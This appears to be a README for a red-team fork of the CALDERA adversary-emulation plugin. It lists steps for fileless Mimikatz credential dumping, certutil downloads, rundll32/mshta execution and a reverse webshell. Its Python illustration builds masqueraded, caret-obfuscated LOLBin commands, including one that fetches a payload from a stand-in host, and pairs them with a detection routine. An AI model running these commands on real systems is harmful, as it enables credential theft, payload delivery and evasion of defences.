This repo contains changes made to the Adversary Plugin repo for CALDERA 2.0.
Video: Available here
Files that were changed include:

- The following steps:
  - `dump_creds`, a fileless Mimikatz-in-PowerShell action using `CustomCommandLine` (see below);
  - `certutil_download`, which can download files using the Certutil LOLBin;
  - `rundll32_execution`, which can execute commands using the RunDLL32/MSHTA LOLBin;
  - `webserver_install`, which prepares a webserver installation (creates an `OPSoftware` object, see below); and
  - `webshell_execution`, which uses the above three actions to set up a reverse webshell.
- `operation.py`, which introduces `OPSoftware`, which is used by some of the above actions (to implement LOLBins); and
- `command.py`, which introduces `CustomCommandLine`, which can obfuscate commands and apply masquerading.
Note that this is still a proof of concept, as it requires you to supply `drop_file` and `file_g` functions in order to make CALDERA aware of renamed binaries in case of masquerading (see e.g. `dump_creds`). This should be further optimised.
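The three ideas the steps above combine (LOLBin command lines, masquerading by running a renamed copy of the binary, and command obfuscation) are shown below in a standalone Python example. This is added illustration code, not the plugin's `CustomCommandLine` or `OPSoftware` implementation: the drop directory, the fake process name and the indicator table are assumptions, and the detection side is included to show why a rule should key on the arguments rather than on the image name.

```python
"""Standalone illustration (not the plugin's code) of LOLBin command lines,
masquerading and cmd.exe caret obfuscation, plus the normalisation a
defender needs to undo the obfuscation before matching."""
import random
from typing import Set, Tuple

SYSTEM32 = r"C:\Windows\System32"
# Assumed staging directory for masqueraded copies (not specified by the page).
DROP_DIR = r"C:\Users\Public"


def masquerade(binary: str, fake_name: str) -> Tuple[str, str]:
    """Return (copy_command, new_path) that stages a renamed copy of a
    System32 LOLBin, e.g. certutil.exe copied as svchost.exe."""
    src = rf"{SYSTEM32}\{binary}"
    dst = rf"{DROP_DIR}\{fake_name}"
    return f'copy /Y "{src}" "{dst}"', dst


def certutil_download(url: str, dest: str, exe: str = "certutil.exe") -> str:
    """certutil's URL-cache download form; `exe` may be a masqueraded path."""
    return f'{exe} -urlcache -split -f "{url}" "{dest}"'


def rundll32_mshta(payload: str, exe: str = "rundll32.exe") -> str:
    """rundll32 -> mshta -> WScript.Shell chain as documented by LOLBAS.
    `payload` must not itself contain double quotes."""
    return (f'{exe} javascript:"\\..\\mshta.exe,RunHTMLApplication ";'
            f'document.write();new%20ActiveXObject("WScript.Shell").Run("{payload}")')


def caret_obfuscate(cmd: str, seed: int = 0, rate: float = 0.5) -> str:
    """Insert cmd.exe escape carets before letters outside double quotes.
    cmd.exe strips an unquoted '^' and keeps the next character literally,
    so the line executes identically but no longer contains substrings such
    as 'certutil' for a naive string rule to match."""
    rng = random.Random(seed)
    out, in_quotes = [], False
    for ch in cmd:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isalpha() and not in_quotes and rng.random() < rate:
            out.append("^")
        out.append(ch)
    return "".join(out)


def caret_normalize(cmd: str) -> str:
    """Undo caret escaping the way cmd.exe's parser does: outside quotes,
    '^X' becomes 'X' (so '^^' becomes '^' and '^"' a literal, non-toggling quote)."""
    out, in_quotes, i = [], False, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == "^" and not in_quotes and i + 1 < len(cmd):
            out.append(cmd[i + 1])
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        out.append(ch)
        i += 1
    return "".join(out)


# Assumed indicator table: argument patterns that survive renaming the binary.
INDICATORS = {
    "certutil_urlcache": ("-urlcache", "-f"),
    "rundll32_mshta": ("mshta.exe,RunHTMLApplication",),
}


def detect(cmdline: str) -> Set[str]:
    """Normalise carets first, then match on arguments, not on the image name."""
    norm = caret_normalize(cmdline).lower()
    return {name for name, needles in INDICATORS.items()
            if all(n.lower() in norm for n in needles)}


if __name__ == "__main__":
    copy_cmd, fake = masquerade("certutil.exe", "svchost.exe")
    dl = certutil_download("http://10.0.0.1/p.exe", rf"{DROP_DIR}\p.exe", exe=fake)
    ob = caret_obfuscate(dl, seed=1, rate=1.0)
    print(copy_cmd)
    print(ob)
    print(detect(ob))
```

Masquerading alone defeats a rule on the process name, and caret obfuscation alone defeats a rule on the raw command line; `detect` survives both because it normalises the line and keys on the argument pattern. A renamed copy is still identifiable on the endpoint by its hash or PE original-filename metadata, which is what the `drop_file`/`file_g` bookkeeping mentioned above has to track on the CALDERA side.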
Make sure you have the most recent version of CALDERA (for instructions, check the CALDERA repo).

You can either copy the files manually into your `caldera/plugins/adversary` folder, or:

1. In the main `caldera/` folder, run the following command: `git config --file=.gitmodules -e`
2. Update the `plugins/adversary` entry, pointing it to `https://github.com/wietze/bsides-ldn-2019.git` (or `git@github.com:wietze/bsides-ldn-2019.git` if you're using SSH).
3. Run the following command to update to the latest version of this repo: `git submodule sync && git submodule update --remote --merge`

If you want to return to the original MITRE repository, follow steps 1-3 again, but use `https://github.com/mitre/adversary.git` (or `git@github.com:mitre/adversary.git` if you're using SSH) in step 2.